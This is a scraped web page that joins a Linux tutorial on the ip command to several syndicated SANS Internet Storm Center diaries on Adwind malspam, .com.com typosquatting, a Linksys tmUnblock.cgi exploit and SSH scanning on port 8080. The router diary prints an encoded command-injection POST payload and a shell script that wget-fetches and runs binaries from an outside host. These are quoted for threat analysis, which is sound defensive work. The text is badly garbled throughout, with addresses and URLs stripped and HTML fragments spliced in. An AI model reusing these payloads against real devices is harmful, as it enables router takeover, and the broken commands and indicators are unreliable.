    • Manage both default and static routing

    • Configure tunnel over IP

    • Configure ARP or NDISC cache entry

    With all of that said, let’s embark on replacing ifconfig with ip. I’ll offer a few examples of how the replacement command is used. Understand that this command does require admin privileges (so you’ll either have to su to root or make use of sudo — depending upon your distribution). Because these commands can make changes to your machine’s networking information, use them with caution.

    NOTE: All addresses used in this how-to are examples. The addresses you will use will be dictated by your network and your hardware.

    Now, on with the how-to.

    Gathering Information

    The first thing most people learn with the ifconfig command is how to find out what IP address has been assigned to an interface. This is usually done with the command ifconfig and no flags or arguments. To do the same with the ip command, it is run as such:

    ip a

    This command will list all interfaces with their associated information (Figure 1 above).

    Let’s say you only want to see IPv4 information (for clarity). To do this, issue the command:

    ip -4 a

    Or, if you only want to see IPv6 information:

    ip -6 a

    What if you only want to see information regarding a specific interface? You can list information for a wireless connection with the command:

    ip a show wlan0

    You can even get more specific with this command. If you only want to view IPv4 on the wlan0 interface, issue the command:

    ip -4 a show wlan0

    You can even list only the running interface using:

    ip link ls up

    Modifying an Interface

    Now we get into the heart of the command… using it to modify an interface. Suppose you wanted to assign a specific address to the first ethernet interface, eth0. With the ifconfig command, that would look like:

    ifconfig eth0

    With the ip command, this now looks like:

    ip a add dev eth0

    You could shorten this a bit with:

    ip a add dev eth0

    Clearly, you will need to know the subnet mask of the address you are assigning.

    What about deleting an address from an interface? With the ip command, you can do that as well. For example, to delete the address just assigned to eth0, issue the following command:

    ip a del dev eth0

    What if you want to simply flush all addresses from all interfaces? The ip command has you covered with this command:

    ip -s -s a f to

    Another crucial aspect of the ip command is the ability to bring up/down an interface. To bring eth0 down, issue:

    ip link set dev eth0 down

    To bring eth0 back up, use:

    ip link set dev eth0 up

    With the ip command, you can also add and delete default gateways. This is handled like so:

    ip route add default via

    If you want to get really detailed on your interfaces, you can edit the transmit queue. You can set the transmit queue to a low value for slower interfaces and a higher value for faster interfaces. To do this, the command would look like:

    ip link set txqueuelen 10000 dev eth0

    The above command would set a high transmit queue. You can play around with this value to find what works best for your hardware.

    You can also set the Maximum Transmission Unit (MTU) of your network interface with the command:

    ip link set mtu 9000 dev eth0

    Once you’ve made the changes, use ip a list eth0 to verify the changes have gone into effect.

    Managing the Routing Table

    With the ip command you can also manage the system’s routing tables. This is a very powerful element of the ip command, and you should use it with caution.

    Suppose you want to view all routing tables. To do this, you would issue the command:

    ip r

    The output of this command will look like that shown in Figure 2.


    Now, say you want to route all traffic via the gateway connected via eth0 network interface: To do that, issue the command:

    ip route add dev eth0

    To delete that same route, issue:

    ip route del dev eth0

    This article should serve as merely an introduction to the ip command. This, of course, doesn’t mean you must immediately jump from ifconfig. Because the deprecation of ifconfig has been so slow, the command still exists on many a distribution. But, on the occasion of ifconfig finally vanishing from sight, you’ll be ready to make the transition with ease. For more detailed information on the ip command, take a look at the ip man page by issuing the command man ip from a terminal window.

    SANS Internet Storm Center, InfoCON: green: Adwind: another payload for botnet-based malspam, (Fri, Aug 14th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


    Since mid-July 2015, Ive noticed an increase in malicious spam (malspam) caught by my employers spamfilters with java archive (.jar file) attachments. These .jar files are most often identified as Adwind. Adwind is a Java-based remote access tool (RAT) used by malware authors to infect computers with backdoor access. Theres no vulnerability involved. To infect a Windows computer, the user has to execute the malware by double-clicking on the .jar file. Of course, you have to have the Java Runtime Environment installed, which many people do.

    Ipreviously associated Adwindwith targetedphishing attempts in limited amounts. I hadfoundvery few examples of non-targetedmalspam using this RAT.

    However, werecurrently seeing enough Adwind-based malspam to ask: Is Adwind now another payload for botnet-based malspam?


    Adwind originated from the Frutas RAT [1]. Frutas was a Java-based RAT discovered by Symantec from underground forums in early 2013 [2]. By the summer of 2013, the name had changed to Adwind, and signatures for Adwind-based malware were implemented by anti-virus companies [3]. In November of 2013, Adwind was rebranded and sold under a new name: UNRECOM (UNiversal REmote COntrol Multi-platform) [1].

    Throughout 2013, we noticed a few occasions of Adwind used in phishing attempts. 2014 saw an increase of Adwind/UNRECOM malware used in phishing campaigns targeting U.S. state and local government, technology, advisory services, health, and financial sectors [4].

    By April 2015, a new Adwind/UNCRECOM variant called AlienSpy was widely reported, and this new variant included Transport Layer Security (TLS) encryption for command-and-control communications. These TLS communications involve certificates. EmergingThreats posted asignature for Adwind-based certificates in March of 2015 [5], and Fidelis CyberSecurity Solutions published an in-depth report on AlienSpy the following month [6].

    The naming progression appears to be: Frutas – Adwind – UNRECOM – AlienSpy. From what I can tell, its all been Java-based malware sent as .jar file attachments in phishing emails. Many people still refer to it as Adwind, which is how I see it identified most often.

    Not counting targeted attempts, Ive found Adwind-based malspam maybe once every month or two. That changed in mid-July 2015. After that, the amount of malspam with Adwindincreased dramatically. Currently, Isee at least one Adwind-based malspam every day on average. The frequency of this malspam along with the variety of subject lines, attachment names, and senders indicate Adwind is no longer limited to targeted attacks. Frutas/Adwind/UNRECOM/AlienSpy (whatever you want to call it) appears to be another payload for botnet-based malspam.

    The emails

    Heres a sample of the different senders, subjects, and attachment names I”> malware maybe once every month or two. I never paid much attention to it until I noticed the recent increase. “>Icollected some samples during the past week and examined them. With the appropriate software packages installed, I could use the commandjar tf [filename]to list the contents of the Java archive. ” />
    Shown above: Listing some of the Adwind .jar files contents

    Command and control communications

    Samples collected during the past week show the following TLS-encrypted SSL traffic after the infection:

    Read: host name – IP address – port

    • – – TCP port 588
    • – – TCP Port 8001
    • – – TCP port 10000
    • – – TCP port 9887
    • – TCP port 1818

    I examined a pcap from the last malware sample above, with command-and-control traffic on TCP port 1818. You can find the certificate associated with Adwind in Wireshark. First, follow a TCP stream with the traffic on port 1818. From the Wireshark menu, select: Analyze -” />

    Wireshark will now parse this TCP stream as SSL. ” />

    This still shows the same certificate information used since EmergingThreats tagged it intheir snort signature from March 2015 [5]. I saw the same certificate information used last week [7], and it continues this week.

    • commonName = assylias
    • organizationName = assylias.Inc
    • countryName = FR

    Currently, this may be the best way to identify Adwind-based post-infection traffic. “>Malware samples

    Below, Ive included information on examples for Adwind malware found during the past week:

    File name: Invoice-Processed.jar

    • File size 96.5 KB ( 98,866 bytes )
    • MD5 hash: d93dd17a9adf84ca2839708d603d3bd6
    • SHA1 hash: ddca2db7b7ac42d8a4a23c2e8ed85de5e91dbf29
    • SHA256 hash: d5d3d46881d8061bb3679aee67715f38bebefb6251eb3fdfa4a58596db8f5b16
    • Detection ratio: 8 / 50
    • First submission: 2015-08-09 08:27:37 UTC
    • Virus Total linkMalwr linkHybrid-Analysis link
    • Command and control: – – TCP port 588

    File name: Products List.jar

    • File size: 99.0 KB ( 101,349 bytes )
    • MD5 hash: 201fd695feba07408569f608cd639465
    • SHA1 hash: b11857de46ba3365af5f46171bbe126f19483fee
    • SHA256 hash: 0e198e6e1b9cfa5be0d9829e10717093487548b5c0d6fbbeaae6be1d53691098
    • Detection ratio: 8 / 56
    • First submission: 2015-08-10 19:42:56 UTC
    • Virus Total linkMalwr linkHybrid-Analysis link

    File name: Purchase Order (PO).jar

    • File size: 99.0 KB ( 101,344 bytes )
    • MD5 hash: 78990750a764dce7a7a539fb797298a1
    • SHA1 hash: af35dc7c1e4a32d53fe41e2debc73a82cc1f52bd
    • SHA256 hash: 9eeeb3b6be01ad321c5036e6c2c8c78244b016bf7900b6fd3251139149dae059
    • Detection ratio: 8 / 56
    • First submission: 2015-08-10 19:43:20 UTC
    • Virus Total linkMalwr linkHybrid-Analysis link

    File name: Invoice.jar

    • File size: 96.6 KB ( 98,903 bytes )
    • MD5 hash: da9f9b69950a64527329887f8168f0b4
    • SHA1 hash: 752fab5861093e7171463b0b945e534e1ff66253
    • SHA256 hash: 70290f0ffffcb4f8d90bce59f16105fd5ff61866e3dda5545b122b3c4098051b
    • Detection ratio: 10 / 56
    • First submission: 2015-08-10 06:40:09 UTC
    • VirusTotal linkMalwr linkHybrid-Analysis link
    • Command and control: – – TCP Port 8001


    • File size: 99.0 KB ( 101,342 bytes )
    • MD5 hash: 1fb2b0742e448124c000c34912765634
    • SHA1 hash: 29d5d03dab95cd5d38bd691d5559202816d36417
    • SHA256 hash: ff2b35d58d2e1ade904187eeffba709c84a9a998c6323b22fc5b7cac74cd1293
    • Detection ratio: 25 / 56
    • First submission: 2015-08-10 10:12:16 UTC
    • VirusTotal LinkMalwr linkHybrid-Analysis link
    • Command and control: – – TCP port 10000

    File name: Request Quotation Item.jar

    • File size: 99.0 KB ( 101,370 bytes )
    • MD5 hash: e08b81fd1b1b409096e65011e96ac62b
    • SHA1 hash: 0fa5ce77ba5df13c596824681402c3ece7b5c1e8
    • SHA256 hash: 771bb9fe6db1453e3de20ba7c39b8502c1249c6fcfd0022031ab767636136e7a
    • Detection ratio: 26 / 56
    • First submission: 2015-08-10 19:09:04 UTC
    • VirusTotal linkMalwr linkHybrid-Analysis link
    • Command and control: – – TCP port 9887

    File name: Price Check.jar

    • File size: 99.0 KB ( 101,359 bytes )
    • MD5 hash: 5190bde4532248eb133f4dae044c492a
    • SHA1 hash: 54484c3a466fb8efb982520a714045d218c83dcf
    • SHA256 hash: d54e97bc1204f3674572d60e17db04c11bbe018ba9ab0250bd881cbcc5a9622e
    • Detection ratio: 25 / 56
    • First submission: 2015-08-11 15:57:22 UTC
    • VirusTotallinkMalwr linkHybrid-Analysis link

    File name: Invoice.jar

    • File size: 93.2 KB ( 95,455 bytes )
    • MD5 hash: 0df04436cce61f791ec7da24ab34d71b
    • SHA1 hash: 75fa848e0048e040aed231f9db45b14bf1a903d7
    • SHA256 hash: f2188d223305092fe0a9c8be89c69e149c33c3ea4b1c0843fda00771ac72272d
    • Detection ratio: 10 / 55
    • First submission: 2015-08-12 19:53:46 UTC
    • VirusTotal linkMalwr linkHybrid-Analysis link

    File name: CDX30404.jar

    • File size: 100.6 KB ( 102,970 bytes )
    • MD5 hash: 5ab9653be58e63bf8df7fb9bd74fa636
    • SHA1 hash: 3af9157dffde41f673cdacc295f2887b5c56e357
    • SHA256 hash: f8f99b405c932adb0f8eb147233bfef1cf3547988be4d27efd1d6b05a8817d46
    • Detection ratio: 22 / 49
    • First submission: 2015-08-09 20:57:26 UTC
    • VirusTotal linkMalwr linkHybrid-Analysis link
    • Command and control: – TCP port 1818

    File name: PO#192603.jar

    • File size: 95.6 KB ( 97,918 bytes )
    • MD5 hash: c5cdbf91ebd4bab736504415806a96b7
    • SHA1 hash: ceb29d24f0dc96d867c9a99306d155a31c5eb807
    • SHA256 hash: 48a0859478fb2b659e527ed06abf44ef40d84c37a5117d49ca2312feed1b1b7d
    • Detection ratio: 13 / 56
    • First submission: 2015-08-13 17:21:33 UTC
    • VirusTotallinkMalwr linkHybrid-Analysis link

    Final words

    I collected some emails from the past few days, sanitized them, and saved them to a zip archive. That archive is available at:

    The zip archive is password-protected with the standard password. If you dont know it, email and ask.

    This malspam might allbe from the same botnet, but I havent had time to dig through the malware samples to confirm. Furthermore, my view is limited to whatever I collect from the spam filters at my current employer. I suspect other organizationswith access to more data have better insight.

    If any of you have encountered examples of this malspam, feel free to share in the comments.

    Brad Duncan
    Security Researcher at Rackspace
    Blog: – Twitter: @malware_traffic



    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: .COM.COM Used For Malicious Typo Squatting, (Mon, Aug 10th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    Today, our reader Jeff noted how domains ending in are being redirected to what looks like malicious content.Back in 2013, A blog by Whitehat Security pointed out that the famous domain name was sold by CNET to known typo squatter [1]. Apparently, paid $1.5 million for this particular domain.Currently, the whois information uses privacy protect, and DNS for the domain is hosted by Amazons cloud.

    All hostnames appear to resolve to54.201.82.69, also hosted by Amazon ( is also directed to the same IP, but right now results in more of a Parked page, not the fake anti-malware as other domains)

    The content you receive varies. For example, on my first hit from my Mac to , I received the following page:

    And of course the fake scan it runs claims thatI have a virus :)

    As a solution, I was offered the well known scam-app Mackeeper

    Probably best to block DNS lookups for any domains. The IP address is likely going to change soon, but I dont think there is any valid content at any host name.

    The Whitehat article does speak to the danger of e-mail going to these systems. A MX record is configured, but the mail server didnt accept any connections from me (maybe it is overloaded?).

    Amazon EC2 abuse was notified.


    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: Whatever Happened to tmUnblock.cgi ("Moon Worm"), (Tue, Aug 4th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    Last year, we wrote about the Moon Worm, a bitcoin mining piece of malware that infected Linksys routers. Ever since then, I have seen lots and lots of hits to the vulnerable cgi script (tmUnblock.cgi”> – – [04/Aug/2015:10:03:44 +0000] GET /tmUnblock.cgi HTTP/1.1 200 195 – – – – [04/Aug/2015:10:03:45 +0000] POST /tmUnblock.cgi HTTP/1.1 200 195 – -“>POST /tmUnblock.cgi HTTP/1.1
    Host: [server ip address]:8080
    Accept-Encoding: identity
    Content-Length: 850

    %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e %3d%61%63%74%69%6f%6e%3d%63%6f%6d%6d%69%74%3d%74%74%63%70%5f%6e%75%6d%3d%32%74 %74%63%70%5f%73%69%7a%65%3d%32%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74 %6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%69%72%6b%31%2e %73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%69%72%6b%32%2e%73%68%20%68%74 %74%70%3a%2f%2f%31%30%39%2e%32%30%36%2e%31%37%37%2e%31%36%2f%66%65%72%72%79%2f%72 %65%76%31%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68%3b%65%63%68%6f%20%22%63 %68%6d%6f%64%20%2b%78%20%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68 %3b%65%63%68%6f%20%22%2e%2f%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73 %68%3b%63%68%6d%6f%64%20%2b%78%20%69%72%6b%31%2e%73%68%3b%2e%2f%69%72%6b%31%2e%73 %68%60″>submit_button=change_action=action=commit=ttcp_num=2ttcp_size=2echo #!/bin/sh echo wget -O hxxp:// echo chmod +x echo ./ ./`StartEPI=1

    Unlike for the Moon worm, the additional malware is not pulled from the host sending the exploit. The /”>#!/bin/sh
    cd /tmp
    wget -O .nttpd hxxp://,14-le-t1
    chmod +x .nttpd
    sleep 2
    wget -O .sox,14-le-t1
    chmod +x .sox

    The script downloads and runs two additional executables. I havent done the full analysis yet (let me know if you want a copy and can”>INPUT -p udp –dport 9999 -j DROP
    INPUT -p tcp -m multiport –dport 80,8080 -j DROP
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT

    So looks like the attacker is securing the router by blocking access to the web based admin (port 80, 8080) and allowing access from very specific IP addresses, probably controlled by the attacker.

    Virustotal identifies .nttpd and .soxas a proxy(Avast, DrWeb) . Reports for these binaries go back a few months.

    The scripts also appear to modify name servers in resolv.conf, but so far I think they only set them to Googles name servers ( and

    FWIW: per whois,, belongs to Serverel, a California company (but it is RIPE IP address space) was notified.

    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: Your SSH Server On Port 8080 Is No Longer "Hidden" Or "Safe", (Mon, Aug 3rd)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    I am seeing some scanning for SSH servers on port 8080 in web server logs for web servers that listen on this port. So far, I dont see any scans like this for web servers listening on port 80. In web server logs, the scan is reflected as an Invalid Method (error 501) as the web server only sees the banner provided by the SSHclient, and of course can not respond.

    For example: – – [03/Aug/2015:08:31:55 +0000] SSH-2.0-libssh2_1.4.3 501 303 – –

    This IP address in this example is for now the most prolific source of these scans:

    inetnum: -        CHINANET-JSdescr:          CHINANET jiangsu province networkdescr:          China Telecomdescr:          A12,Xin-Jie-Kou-Wai Streetdescr:          Beijing 100088country:        CN

    With very frequent scans for SSH servers, users often move them to an alternative port. I am not aware of a common configuration moving them to port 8080, but it is certainly possible that this has become somewhat a common escape port.

    Please let us know if you have any details to fill in. Any other sources for these scans? Any reason why someone would use port 8080 for an ssh server? If you use an alternative port, one more random would certainly be better, in particular if the port is not in default port lists (like the one used by nmap).

    As usual, hiding your SSH server on an off-port is good. But you ceratinlyshould still use keys, not passwords, to authenticate and follow other best practices in configuring and maintaining your SSH server.

    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.